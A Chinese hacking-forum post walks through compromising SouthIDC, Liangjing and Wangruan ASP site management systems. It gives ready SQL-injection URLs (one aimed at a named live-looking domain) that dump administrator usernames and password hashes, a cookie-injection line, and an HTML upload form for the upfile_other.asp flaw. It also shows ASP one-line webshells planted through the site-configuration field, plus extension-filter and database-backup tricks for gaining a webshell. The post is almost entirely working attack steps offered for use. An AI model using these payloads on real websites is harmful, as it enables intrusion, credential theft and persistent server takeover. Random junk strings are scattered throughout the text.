找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2938|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb; v5 b  g) E$ e1 J! j
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 ( q- m5 r1 ^& }6 N
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F78 p; r# D  [3 J1 H" k( g  X
直接暴管理员帐号密码(md5)
6 \, n% K) `" S& Y2.登陆后台8 P2 A0 E6 H1 e
3.利用编辑器上传:
; W! i* f$ P  N/ f- R2 h访问admin/southidceditor/admin_style.asp: }  b& p) S; {5 t5 L4 o+ R
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
' [, X* E+ J  S. ?3 s3 J  t7 N8 ]$ ?7 a8 R+ ~7 H5 D' m
========================================# D1 D5 B# |9 {$ v8 c" f6 @
. B. u8 Q8 l8 L# z
参考资料整理:
) M% t8 |" j9 _8 I; S) E+ |3 C# s7 R南方数据、良精系统、网软天下漏洞利用* F' D9 A/ W- u

& h" p3 E* T1 ]! j: N. y1、通过upfile_other.asp漏洞文件直接取SHELL$ w2 Q! Z- \$ k, B3 e: G7 Q% N/ l
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
2 Z; z; ?0 O) R1 k<HTML><HEAD> 7 w' ^* ]" Y- P+ i' B  x1 f/ z
<META http-equiv=Content-Type content="text/html; charset=gb2312"> : C! |1 V8 v) p9 H7 U+ o! y
<STYLE type=text/css>BODY { - r& j6 p' a* u& n8 p2 a' a  i% Y) R
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
. G" H7 s  d9 G9 D}
6 j7 c2 n" K" @3 _" T% s9 H8 O/ r.tx1 {
- Y5 u. z( e. M7 F0 n( B9 u' EBORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px + X! s/ M9 q6 ~* U! ^
} 8 y+ w& _- D3 Y. }: T
</STYLE># R9 k7 d# j( r: N. p; T# @, U
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
# j; [4 _% e% B' }/ v8 b8 W<BODY leftMargin=0 topMargin=0> 0 b  U- X$ N: E/ p6 M  O3 ^
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post ) w2 f( l8 C2 h
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
# }6 n7 x' T# ^! o- M/ ^<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>( T+ k. o; {" T" z" Q# G9 j( D
. C. k2 i. V1 U8 l7 U
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。6 E/ i3 }2 k  R0 q" G1 l9 F
注:此方法通杀南方数据、良精系统、网软天下等
# M- i& g! i( Y; r
) ^/ q& j( W9 U1 v2、通过注入秒杀管理员帐号密码,使用如下:
( p/ \$ b' y9 q  a5 a7 E+ [http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
: {' x" P& ~) J$ P以上代码直接暴管理员帐号和密码,取SHELL方法如下:/ ^4 P; O+ N0 k
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
' C* U5 G7 i: [% b) S成功把shell写入http://www.target.com/inc/config.asp9 L# k7 {8 F- w& V
这里一句话chr(32)密码是“#”1 e/ h3 H/ i  ~6 X! j
3、cookie注入
, g4 M) y, ?3 C( H0 u清空地址栏,利用union语句来注入,提交:* z+ J" B* f) B1 P6 ]" n
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))9 L2 I- A% X1 F0 r5 A8 ^7 F# `
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
: X/ v* {5 J9 p. d8 p9 p# c* F注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。% j+ m0 ?; c* T
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)2 y% {) B. a% s0 s8 d! r
) `( J5 t# }0 M9 c- x8 \# e7 D. K
三、后台取SHELL方法总结
' n7 `  x' H8 |( a4 g7 `(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:9 B& {% M% F. B  Y: C: a
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,: U# J/ V8 a  u$ E
这时再打开一句话马的客户端,提交同样得到一个小马
$ m& V2 p( r* z" q(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
) `* M/ `- \( F7 s( D3 ]9 o+ H(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:0 V" S2 A6 _9 Y9 i7 h
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then; k* \# O, e% b% f5 o
EnableUpload=false
6 f8 Y% ?* K1 U5 z! h/ U& C; r2 Z3 A' ]3 C* T& L6 l2 t* Q. o
end if 6 J/ t2 m! O( B' }9 T0 G
if EnableUpload=false then! S6 G$ h5 k, s8 _2 n
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
- J. S, ]% A9 _5 wFoundErr=true
& }' V0 A/ u/ I4 f' f2 @, Oend if  x5 I: o1 G  U& d0 @
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:3 U. x9 K/ Q! C) `4 j$ Q* t. k3 C
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
  n- V! m7 |2 A) K$ z(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
6 C, z. E0 ^/ r7 K2 B6 j' p4 D! Q
2 x6 g8 A9 u. Q7 v点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的* q; W, O( s) m7 M
直接访问备份后的地址,就得到一个webshell5 r' P7 g- L: n' I. C5 E
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表